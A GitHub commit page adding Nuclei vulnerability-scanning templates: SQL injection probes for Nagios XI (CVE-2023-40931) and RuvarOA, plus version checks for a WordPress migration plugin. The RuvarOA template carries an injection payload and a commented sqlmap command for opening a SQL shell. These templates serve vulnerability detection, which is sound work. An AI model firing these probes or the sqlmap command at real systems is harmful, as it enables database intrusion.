-
Notifications
You must be signed in to change notification settings - Fork 272
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
a1a3429
commit e6b6301
Showing
6 changed files
with
242 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241027 | ||
20241028 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
id: CVE-2023-40931 | ||
|
||
info: | ||
name: Nagios XI v5.11.0 - SQL Injection | ||
author: ritikchaddha | ||
severity: medium | ||
description: | | ||
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php. | ||
impact: | | ||
Successful exploitation of this vulnerability allows an authenticated attackers to execute arbitrary SQL commands. | ||
remediation: | | ||
Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. | ||
reference: | ||
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c | ||
- https://nvd.nist.gov/vuln/detail/CVE-2023-40931 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 6.5 | ||
cve-id: CVE-2023-40931 | ||
cwe-id: CWE-89 | ||
epss-score: 0.00208 | ||
epss-percentile: 0.59103 | ||
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 3 | ||
vendor: nagios | ||
product: nagios_xi | ||
shodan-query: title:"Nagios XI" | ||
fofa-query: app="nagios-xi" | ||
google-query: intitle:"nagios xi" | ||
tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /nagiosxi/login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
POST /nagiosxi/login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}} | ||
- | | ||
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
action=acknowledge_banner_message&id=* | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "Failed to acknowledge" | ||
- "SQL Error" | ||
- "right syntax to use near" | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: regex | ||
name: nsp | ||
part: body | ||
group: 1 | ||
regex: | ||
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>" | ||
internal: true | ||
|
||
# digest: 4a0a00473045022100eaedc676d34f68f9a9a22fc03718775356d34be1a378b3357b5635b2fe881edf022072000ae329286b87e05098a88d3a135a1458d3cefafbe5ac6196122f41dccddc:922c64590222798bb761d5b6d8e72950 |
59 changes: 59 additions & 0 deletions
59
poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f | ||
|
||
info: | ||
name: > | ||
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection | ||
author: topscoder | ||
severity: low | ||
description: > | ||
The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 7.2 | ||
cve-id: CVE-2024-9162 | ||
metadata: | ||
fofa-query: "wp-content/plugins/all-in-one-wp-migration/" | ||
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" | ||
shodan-query: 'vuln:CVE-2024-9162' | ||
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "all-in-one-wp-migration" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 7.86') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
id: 2024-105272120 | ||
|
||
info: | ||
name: RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞 | ||
author: k3ppf0r | ||
severity: high | ||
description: | | ||
RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 | ||
reference: | ||
- https://blog.csdn.net/qq_41904294/article/details/138723401 | ||
remediation: | | ||
升级RuvarOA到高版本 | ||
classification: | ||
cve-id: 2024-105272120 | ||
cvss-score: 7.8 | ||
cwe-id: CWE-89 | ||
metadata: | ||
date: 2024-05-11 | ||
version: RuvarOA V6.01 、RuvarOA V12.01 | ||
fofa-query: body="txt_admin_key" | ||
tags: sqli,RuvarOA,leak | ||
|
||
# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell | ||
|
||
|
||
http: | ||
- raw: | ||
- | | ||
@timeout: 10s | ||
GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33 | ||
Connection: close | ||
|
||
stop-at-first-match: true | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code == 200' | ||
condition: and | ||
|
59 changes: 59 additions & 0 deletions
59
poc/wordpress/all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320 | ||
|
||
info: | ||
name: > | ||
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/all-in-one-wp-migration/" | ||
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "all-in-one-wp-migration" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 7.86') |